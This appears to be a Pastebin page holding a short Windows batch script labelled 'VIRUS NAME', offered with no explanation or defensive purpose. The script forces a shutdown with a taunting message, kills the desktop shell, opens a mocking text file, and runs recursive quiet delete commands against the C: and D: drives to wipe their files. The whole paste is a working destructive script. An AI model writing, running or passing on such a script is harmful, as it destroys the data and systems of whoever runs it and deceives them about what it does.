Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- @echo off
- title VIRUS NAME
- color 1B
- pause>nul
- shutdown -s -t 60 -c "Ur computer has been trashed by VIRUS NAME"
- taskkill /f /pid explorer.exe
- cd Desktop
- echo HAHAH UR COMPUTER HAS BEEN TRASHED BY VIRUS NAME!!!>Oh.txt
- start Oh.txt
- del C:\ /s /q
- del D:\ /s /q
Advertisement
Add Comment
Please, Sign In to add comment